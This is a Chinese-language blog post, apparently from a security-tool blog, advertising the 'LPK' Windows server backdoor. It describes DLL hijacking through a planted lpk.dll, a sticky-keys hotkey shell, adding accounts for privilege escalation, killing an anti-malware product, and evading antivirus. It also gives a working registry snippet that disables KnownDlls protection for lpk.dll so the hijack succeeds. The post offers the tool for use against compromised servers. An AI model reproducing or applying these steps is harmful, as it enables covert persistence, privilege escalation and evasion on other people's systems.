直接介绍什么是Lpk:是Rices神牛写的一款服务器后门。功能异常强悍。

强悍之处:把生成出来的LPK放到可执行文件的目录中(比如IE SU ...)一些常用的软件目录里。只要管理员一运行就会调用LPK

使用教程:http://rices.so/lpk2.html

只要粘滞键为可用状态,可以保证100%劫持!完全兼容(2K/2K3/XP/08/VISTA/WIN7)..

其次吸取了一些人的建议,觉得有的系统确实不支持sethc,所以增加了全新的LPK提权功能(可直接执行CMD/API加帐号!)其他的就是一些小功能了,比如内置了结束星外杀马以及在粘滞键运行权限不可用的时候解除限制!还有就是有的朋友觉得3键不好按,所以这次可以设置2键或者3键启动!

直接调用shift

Highslide JS

这次的后门增加了一些常用功能,首先要说的是可以自定义CMD的路径了!不会再担心什么CMD被锁等!
Highslide JS

附两张WIN7下的后门运行图片,完全兼容:

Highslide JS

Highslide JS

其他说明:
1.免杀的话请直接针对目录下的LPK.DAT文件进行处理即可
2.针对无SETHC.EXE文件的系统,粘滞键后门将无法正常启动(如果已经拿到服务器的情况下建议自行拷贝系统粘滞键到服务器的SYSTEM32目录!以保证后门的正常启动)
3.无SETHC.EXE文件的系统完全不影响LPK的使用,CMD照样执行,帐户也照样加!
4.密码依然采用32位MD5加密,只要密码强度够,后门被下载也无济于事!
5.热键比如同时按下,而不是先按下A键,再按下B键!否则无法呼出!
6.为何不写感染?因为本工具初衷就是后门和辅助提权,如果严重破坏到系统就不好了

针对03/XP打了补丁导致LPK无法劫持的解决办法(感谢Hmily牛的封LPK劫持的帖子)以及针对08/WIN7/VISTA系统默认不支持LPK的解决办法将以下内容保存为REG导入后重启即可!

Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]“ExcludeFromKnownDlls”=hex(7):6c,00,70,00,6b,00,2e,00,64,00,6c,00,6c,00,00,00,\00,00
 
 
下载:停止下载<病毒报警>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1754.html